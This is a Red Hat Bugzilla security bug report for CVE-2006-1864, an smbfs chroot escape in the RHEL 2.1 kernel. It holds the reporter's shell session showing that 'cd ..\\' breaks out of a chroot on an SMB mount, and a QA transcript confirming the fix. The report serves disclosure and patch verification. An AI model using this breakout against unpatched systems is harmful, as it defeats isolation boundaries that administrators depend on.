Bug 189438 - CVE-2006-1864 smbfs chroot issue
Summary: CVE-2006-1864 smbfs chroot issue
Keywords:
Status: CLOSED ERRATA
Alias: None
Product: Red Hat Enterprise Linux 2.1
Classification: Red Hat
Component: kernel
Version: 2.1
Hardware: i386
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Don Howard
QA Contact: Brian Brock
URL:
Whiteboard: impact=moderate,source=redhat,reporte...
Depends On:
Blocks: 143573
TreeView+ depends on / blocked
 
Reported: 2006-04-19 22:52 UTC by Marcel Holtmann
Modified: 2007-11-30 22:06 UTC (History)
1 user (show)

Fixed In Version: RHSA-2006-0579
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2006-07-13 11:46:33 UTC
Target Upstream Version:
Embargoed:

Attachments (Terms of Use)


Links
System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2006:0579 0 normal SHIPPED_LIVE Important: kernel security update 2006-07-13 04:00:00 UTC

Description Marcel Holtmann 2006-04-19 22:52:46 UTC 
When doing a chroot inside of a smb-mounted filesystem (cifs), it appears that
you can break out of it using "cd ..\\" (2 backslashes).

[root@server me]# pwd
/path/to/my/dir
[root@server me]# ls
bin  chroot  etc  lib
[root@server me]# chroot .
bash-2.05a# pwd
/
bash-2.05a# ls
bin  chroot  etc  lib
bash-2.05a# cd ..\\
bash-2.05a# pwd
/..\
bash-2.05a# ls
<list of files from parent>
Comment 6 Mike Gahagan 2006-07-12 15:58:20 UTC 
Fix verified:

.qa.[root@i386-21as-bos tmp]# ll
total 2568
drwxr-xr-x    2 root     root         4096 Jul 12 11:50 backup
-rw-r--r--    1 root     root       768000 Jul 12 11:42 bak.file
drwxr-xr-x    2 root     root         4096 Jun  4 01:38 bin
drwxr-xr-x    2 root     root         4096 Jul 12 08:37 dumper
-rw-r--r--    1 root     root      1048576 Jul 12 09:50 dumpy.iso
drwxr-xr-x   72 root     root         8192 Jul 12 11:58 etc
-rw-r--r--    1 root     root       768000 Jul 12 11:21 file.dump
drwxr-xr-x    9 root     root         4096 Jul 12 11:57 lib
drwxr-xr-x    2 root     root         4096 Jul 12 10:00 restor
.qa.[root@i386-21as-bos tmp]# mkdir /mnt/test
.qa.[root@i386-21as-bos tmp]# cd /mnt/test/
.qa.[root@i386-21as-bos test]# ls
.qa.[root@i386-21as-bos test]# cd ..
.qa.[root@i386-21as-bos mnt]# mount -t smbfs -o username=root,password=
//127.0.0.1/tmp /mnt/test/
Anonymous login successful
.qa.[root@i386-21as-bos mnt]# cd test/
.qa.[root@i386-21as-bos test]# uname -a
Linux i386-21as-bos.lab.boston.redhat.com 2.4.9-e.70 #1 Fri May 5 21:12:54
EDT2006 i686 unknown
.qa.[root@i386-21as-bos test]# chroot .
bash-2.05# cd ..\\
bash: cd: ..\: Invalid argument
bash-2.05# cd ..\\\\
bash: cd: ..\\: Invalid argument
bash-2.05# pwd
/
bash-2.05# ls
backup  bak.file  bin  dumper  dumpy.iso  etc  file.dump  lib  restor
bash-2.05# ls -l
total 2527
drwxr-xr-x    1 root     root          512 Jul 12 11:50 backup
-rwxr-xr-x    1 root     root       768000 Jul 12 11:42 bak.file
drwxr-xr-x    1 root     root          512 Jun  4 01:38 bin
drwxr-xr-x    1 root     root          512 Jul 12 08:37 dumper
-rwxr-xr-x    1 root     root      1048576 Jul 12 09:50 dumpy.iso
drwxr-xr-x    1 root     root          512 Jul 12 11:58 etc
-rwxr-xr-x    1 root     root       768000 Jul 12 11:21 file.dump
drwxr-xr-x    1 root     root          512 Jul 12 11:57 lib
drwxr-xr-x    1 root     root          512 Jul 12 10:00 restor
Comment 8 Red Hat Bugzilla 2006-07-13 11:46:33 UTC 
An advisory has been issued which should help the problem
described in this bug report. This report is therefore being
closed with a resolution of ERRATA. For more information
on the solution and/or where to find the updated files,
please follow the link below. You may reopen this bug report
if the solution does not work for you.

http://rhn.redhat.com/errata/RHSA-2006-0579.html
Note You need to log in before you can comment on or make changes to this bug.